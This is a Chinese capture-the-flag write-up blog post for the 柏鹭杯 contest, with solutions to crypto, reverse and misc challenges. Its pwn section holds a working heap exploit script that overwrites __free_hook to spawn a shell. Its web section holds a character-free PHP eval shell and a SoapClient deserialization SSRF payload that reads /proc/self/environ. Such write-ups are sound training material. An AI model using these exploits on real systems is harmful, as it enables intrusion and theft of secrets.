柏鹭杯


阅读数: 次   
字数统计: 2.9k字   |   阅读时长: 16分

柏鹭杯

[TOC]

河南大学-A1igNed战队

柏鹭杯16名

签到

访问地址发现跳转到主办方官网,抓包看跳转内容

可以看到跳转页面写有flag

crypto

试试大数据分解?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
一看n挺小的,直接扔yafu分解,额,过了3600+秒分解出来了。。。。
***factors found***

P45 = 948539437740472240970258995719507356652939947
P46 = 1033916782753483187367063564275935620987269651

s1=b'BhUXO8RZzppFl7Fw72jbGkEIaH/6/D5c00bYx1HEAPfN5+BeRII='
s2=b'BSiVik1bo999kG2eHzZaVt056rh74oRbbU99OrIE48ds9kQ6AR4='
s3=b'BbGPmOvTr8OYCIgwyEpu5b26jGUY2EHZRu2FUSK/cdUmK0Wqkhc='
s4=b'Axun6PS3aheoX8o3G8e3mtAxHC+C6r95oV84OQ8dxsFsxnYcfo0='
s=[s1,s2,s3,s4]
from base64 import *
s=[b64decode(i) for i in s]
from Crypto.Util.number import *
from gmpy2 import *
s=[bytes_to_long(i) for i in s]

p=948539437740472240970258995719507356652939947
q=1033916782753483187367063564275935620987269651
phi=(p-1)*(q-1)
e=99991
d=invert(e,phi)
print(b''.join([long_to_bytes(pow(i,d,p*q)) for i in s]))
#666c61677b495345432d497235574d5f473441666276785f6d534d5f556766387a52416f4d6b594350787d
#flag{ISEC-Ir5WM_G4Afbvx_mSM_Ugf8zRAoMkYCPx}

pwn

note1

先把tcache填满,再释放一次,得到在unsorted bin中的chunk

再通过切割,填充前8个字节,show带出libc地址

flip()可以调转使用堆块的方向

而堆块的信息(size和指针)是存放在堆中的,并且堆块的信息存放时可以超出0x800的范围,在可申请堆块的范围。

反向申请几个堆块chunk,再反向

申请一个可以控制到堆块信息的堆块,把指针改成free_hook

修改free_hook为system

最后getshell

进去之后发现flag是可执行文件,./flag得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
#!/usr/bin/env python3
# coding=utf-8
from pwn import *

# from z3 import *
arch = "amd64"
filename = "note1"

ip = "8.130.177.112"
port =12031
# libc
# libc
local_libc = ELF("/home/giantbranch/Desktop/clibcc/pwn-change-libc-main/libs/2.31-0ubuntu9.2_amd64/libc-2.31.so")
remote_libc = ELF("/home/giantbranch/Desktop/clibcc/pwn-change-libc-main/libs/2.31-0ubuntu9.2_amd64/libc-2.31.so") #2.31-9.2
# ld
# local_ld=ELF("/lib64/ld-linux-x86-64.so.2")
# remote_ld=ELF("/lib64/ld-linux-x86-64.so.2")

context(os="linux", arch=arch, log_level="debug")
# context.terminal = ['tmux', 'split','-h']
content = 1

offset = 0
# elf
elf = ELF(filename)


def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def add(size,payload):
    io.sendline(b"1")
    io.sendline(str(size).encode())
    io.sendline(payload)

def free():
    io.sendline(b'2')

def edit(payload):
    io.sendline(b'3')
    io.sendline(payload)

def show():
    io.sendline(b'4')

def flip():
    io.sendline(b'5')

def pwn():
    # leak_libc
    for i in range(8):
        add(0x100, b'bbb')
        io.recv()
    for i in range(7):
        free()
        io.recv()
    add(0x88, b'a' * (0x88))
    io.recv()
    free()
    io.recv()
    free()
    io.recv()
    io.sendline(b"1")
    io.recv()
    io.sendline(str(0x68).encode())
    io.recv()
    io.send(b'xxxxxxxx')
    io.recv()
    show()
    io.recvuntil(b'xxxxxxxx')
    addr = u64(io.recv(6).ljust(8, b'\x00'))
    success("addr:"+hex(addr))
    malloc_hook=addr-352-0x10
    success("malloc_hook:"+hex(malloc_hook))
    libcbase=malloc_hook-libc.symbols['__malloc_hook']
    success("libcbase:"+hex(libcbase))
    io.recv()
    free()
    io.recv()
    flip()
    io.recv()
    for i in range(6):
        add(0x100, b'x')
        io.recv()


    # prepare to change ptr
    flip()
    io.recv()
    add(0x80,b'bbb')
    io.recv()
    add(0x80,b'bbbc')
    io.recv()
    flip()
    io.recv()
    # malloc_to_change_ptr
    io.sendline(b"1")
    io.recv()
    io.sendline(str(0x100).encode())
    io.recv()
    free_hook=libcbase+libc.symbols['__free_hook']
    system_addr=libcbase+libc.symbols['system']
    io.send(b'/bin/sh\x00'+b'x' * (0x58) + p64(0x200) + p64(free_hook))
    io.recv()
    flip()
    io.recv()
    ogg=onegadget[2]+libcbase
    # change_free_hook_to_system
    edit(p64(system_addr))
    io.recv()
    flip()
    io.recv()
    free()
    io.recv()
    #
    # b(0x17e7)
    return 1


if __name__ == '__main__':
    global io
    flag = 1
    while flag >= 1:
        try:
            if content == 0:
                io = process("./" + filename)
                libc = local_libc
                # ld = local_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            else:
                io = remote(ip, port)
                libc = remote_libc
                # ld = remote_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            if (pwn() == 0):
                flag -= 1
                continue
            else:
                io.interactive()
                flag = 0
        except Exception as e:
            print(e)
            io.close()
            flag -= 1
            continue

reverse

baby_python

python逆向,解包一下发现被加密了。是pyinstall的加密。直接反编译那个密钥文件,然后得到密钥,然后去wiki找到脚本,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from Crypto.Cipher import AES
from Crypto.Util import Counter
import zlib

CRYPT_BLOCK_SIZE = 16

# key obtained from pyimod00_crypto_key
key = bytes('f8c0870eba862579', 'utf-8')

inf = open('baby_python.baby_core.pyc.encrypted', 'rb') # encrypted file input
outf = open('baby_python.baby_core.pyc', 'wb') # output file

# Initialization vector
iv = inf.read(CRYPT_BLOCK_SIZE)

ctr = Counter.new(128, initial_value=int.from_bytes(iv, byteorder='big'))

cipher = AES.new(key, AES.MODE_CTR, counter=ctr)

# Decrypt and decompress
plaintext = zlib.decompress(cipher.decrypt(inf.read()))

# Write pyc header
# The header below is for Python 3.8
outf.write(b'\x42\x0d\x0d\x0a\x00\x00\x00\x00\x70\x79\x69\x30\x10\x01\x00\x00')

# Write decrypted data
outf.write(plaintext)

inf.close()
outf.close()

解密一下,得到pyc文件,反编译一下发现就是一个简单的矩阵乘法。

直接z3跑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from z3 import *
co = [[158, 195, 205, 229, 213, 238, 211, 198, 190, 226, 135, 119, 145, 205, 113, 122],
      [234, 256, 185, 253, 244, 134, 102, 117, 190, 106, 131, 205, 198, 234, 162, 218],
      [164, 164, 209, 200, 168, 226, 189, 151, 253, 241, 232, 151, 193, 119, 226, 193],
      [213, 117, 151, 103, 249, 148, 103, 213, 218, 222, 104, 228, 100, 206, 218, 177],
      [217, 202, 126, 214, 195, 125, 144, 105, 152, 118, 167, 137, 171, 173, 206, 240],
      [160, 134, 131, 135, 186, 213, 146, 129, 125, 139, 174, 205, 177, 240, 194, 181],
      [183, 213, 127, 136, 136, 209, 199, 191, 150, 218, 160, 111, 191, 226, 154, 191],
      [247, 188, 210, 219, 179, 204, 155, 220, 215, 127, 225, 214, 195, 162, 214, 239],
      [108, 112, 104, 133, 178, 138, 110, 176, 232, 124, 193, 239, 131, 138, 161, 218],
      [140, 213, 142, 181, 179, 173, 203, 208, 184, 129, 129, 119, 122, 152, 186, 124],
      [105, 205, 124, 142, 175, 184, 234, 119, 195, 218, 141, 122, 202, 202, 190, 178],
      [183, 178, 256, 124, 241, 132, 163, 209, 204, 104, 175, 211, 196, 136, 158, 210],
      [224, 144, 189, 106, 177, 251, 206, 163, 167, 144, 208, 254, 117, 253, 100, 106],
      [251, 251, 136, 170, 145, 177, 175, 124, 193, 188, 193, 198, 208, 171, 151, 230],
      [143, 200, 143, 150, 243, 148, 136, 213, 161, 224, 170, 208, 185, 117, 189, 242],
      [234, 188, 226, 194, 248, 168, 250, 244, 166, 106, 113, 218, 209, 220, 158, 228]]
r = [472214, 480121, 506256, 449505, 433390, 435414, 453899, 536361, 423332, 427624, 440268, 488759, 469049, 484574,
     480266, 522818]
s=Solver()
v = [Int('v[%d]'%i) for i in range(16)]
for i in range(16):
    s.add(v[i]>0)
for i in range(16):
    s.add(v[i]<1000)

for i in range(16):
        vv = 0
        for j in range(16):
            vv += co[i][j] * v[j]
        s.add(vv==r[i])
print(s.check())
print(s.model())
m=s.model()
for i in range(16):
    print(m[v[i]],end='')
    
    #113201188123164176154241163109244215152103124165

作为输入,得到flag

flag{ISEC-ca32ab6174689b5e366241ad58108c68}

go

ida7.6打开,发现有加密函数和解密函数,不过要输入参数,我尝试用文件名作为输入,得到然后再下面准备进入加密函数的时候,我patch成解密函数的地址,继续运行,直接得到解密文件。。

O*** JUNK AAAABBBBCCCCDDDD ***O

flag{ISEC-42115cad00f8c4a0495bffa97d2ca3a8}

O*** JUNK EEEEFFFFGGGGHHHH ***O

杂项

蜜雪冰城

条形码,但是被涂上了其他的颜色,于是写个脚本提取出来,画出完整的条形码

1
2
3
4
5
6
7
8
9
10
11
from PIL import Image
img = Image.open('密码.PNG')
w,h = img.size
pic = Image.new('RGB',(w,h),('white'))
for i in range(w):
    for j in range(h):
        if(img.getpixel((i,j)) == (0,0,0,255)):
            for m in range(h):
                pic.putpixel((i,m),(0))
            break
pic.show()

扫码得到密码,解压得到第二层,明显的零宽,然后在kali下查看能够发现200BCD、202ACD和FEFF被选中,解密后是乱码,于是想着导出至二进制文件,导出之后直接显示mp3.

打开mp3后发现是拨号音,于是用AU将mp3改成wav,再用DTMF解密得到密码399#9311233212

最后得到flag

flag{ISEC-45rd4r8f4rq6h5y8u2v1x4f5y9i5afde}

web

Ezphp

index:

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome');
call_user_func($b, $a);
?>

flag.php

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
session_start();
highlight_file(__FILE__);
echo 'only localhost can get shell!';
if ($_SERVER["REMOTE_ADDR"] === "127.0.0.1"){
    $shell=$_GET['i'];
    if(preg_match('/[a-zA-Z0-0]/i',$shell)){
        die('hacker');
    }
    eval($shell);
}
?>
only localhost can get shell!

bestphp's revenge大体相同,注入session,反序列化soap进行SSRF打到flag.php

flag.php 对shell内容有要求,找一个shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
$__=[];
$_=($__==$__);
$__=~(融);
$___=$__[$_];
$__=~(匆);
$___.=$__[$_].$__[$_];
$__=~(随);
$___.=$__[$_];
$__=~(千);
$___.=$__[$_];
$__=~(苦);
$___.=$__[$_];
$____=~(~(_));
$__=~(帿);
$____.=$__[$_];
$__=~(庿);
$____.=$__[$_];
$__=~(站);
$____.=$__[$_];
$_=$$____;
$___($_[_]);
//相当于 eval($_GET[_])

借助session的打印,将命令执行的结果保存在session中,多次尝试找到/proc/self/environ

poc生成:

1
2
3
4
5
6
7
<?php
$url = 'http://127.0.0.1/flag.php?_=$_SESSION["hahaha"]=`cat /proc/self/environ`&i=$__=[]; $_=($__==$__); $__=~(融); $___=$__[$_]; $__=~(匆); $___.=$__[$_].$__[$_]; $__=~(随); $___.=$__[$_]; $__=~(千); $___.=$__[$_]; $__=~(苦); $___.=$__[$_]; $____=~(~(_)); $__=~(帿); $____.=$__[$_]; $__=~(庿); $____.=$__[$_]; $__=~(站); $____.=$__[$_]; $_=$$____; $___($_[_]);';
$b = new SoapClient(null, array('uri' => $url, 'location' => $url));
$a = serialize($b);
$a = str_replace('^^', "\r\n", $a);
echo "|" . urlencode($a);
?>

请求一:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /index.php?f=session_start&name=|O%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A362%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3F_%3D%24_SESSION%5B%22hahaha%22%5D%3D%60cat+%2Fproc%2Fself%2Fenviron%60%26i%3D%24__%3D%5B%5D%3B+%24_%3D%28%24__%3D%3D%24__%29%3B+%24__%3D%7E%28%E8%9E%8D%29%3B+%24___%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8C%86%29%3B+%24___.%3D%24__%5B%24_%5D.%24__%5B%24_%5D%3B+%24__%3D%7E%28%E9%9A%8F%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8D%83%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E8%8B%A6%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24____%3D%7E%28%7E%28_%29%29%3B+%24__%3D%7E%28%E5%B8%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%BA%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E7%AB%99%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24_%3D%24%24____%3B+%24___%28%24_%5B_%5D%29%3B%22%3Bs%3A8%3A%22location%22%3Bs%3A362%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3F_%3D%24_SESSION%5B%22hahaha%22%5D%3D%60cat+%2Fproc%2Fself%2Fenviron%60%26i%3D%24__%3D%5B%5D%3B+%24_%3D%28%24__%3D%3D%24__%29%3B+%24__%3D%7E%28%E8%9E%8D%29%3B+%24___%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8C%86%29%3B+%24___.%3D%24__%5B%24_%5D.%24__%5B%24_%5D%3B+%24__%3D%7E%28%E9%9A%8F%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8D%83%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E8%8B%A6%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24____%3D%7E%28%7E%28_%29%29%3B+%24__%3D%7E%28%E5%B8%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%BA%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E7%AB%99%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24_%3D%24%24____%3B+%24___%28%24_%5B_%5D%29%3B%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D HTTP/1.1
Host: 8.130.177.112:15294
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cookie: PHPSESSID=aaa
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

serialize_handler=php_serialize

请求二:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /index.php?f=extract HTTP/1.1
Host: 8.130.177.112:15294
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=aaa
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

b=call_user_func

多次访问回显参数:

  ["PHPSESSID"]=>
  array(3) {
    [0]=>
    string(26) "7imbbmbj5nbrpl150k0t4j1bm5"
    [1]=>
    string(1) "/"
    [2]=>
    string(9) "127.0.0.1"
  }

请求三:

1
2
3
4
5
6
7
8
9
10
11
GET /index.php HTTP/1.1
Host: 8.130.177.112:15294
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7imbbmbj5nbrpl150k0t4j1bm5
Accept-Language: zh-CN,zh;q=0.9
Connection: close


回显:

1
2
3
4
array(1) {
  ["hahaha"]=>
  string(918) "PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi USER=www-data HOSTNAME=b39c81750af6 PHP_INI_DIR=/usr/local/etc/php SHLVL=2 HOME=/home/www-data PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 PHP_MD5= PHP_VERSION=7.0.33 GPG_KEYS=1A4E8B7277C42E53DBA9C7B9BCAA30EA9C0D5763 6E4F6AB321FDC07F2C332E3AC2BF0BC433CFC8B3 PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 PHP_ASC_URL=https://secure.php.net/get/php-7.0.33.tar.xz.asc/from/this/mirror PHP_URL=https://secure.php.net/get/php-7.0.33.tar.xz/from/this/mirror PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PHPIZE_DEPS=autoconf 		dpkg-dev dpkg 		file 		g++ 		gcc 		libc-dev 		make 		pkgconf 		re2c PWD=/var/www/html PHP_SHA256=ab8c5be6e32b1f8d032909dedaaaa4bbb1a209e519abb01a52ce3914f9a13d96 FLAG=flag{ISEC-c59691c19713573fa23f0876257cfd7c} "
}

FLAG=flag{ISEC-c59691c19713573fa23f0876257cfd7c}



-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

朱登榜,来自河南郑州,河南大学学生,倘若文章有错误,望提醒修正,感谢!<br>qq:879322660<br>微信:z15981855791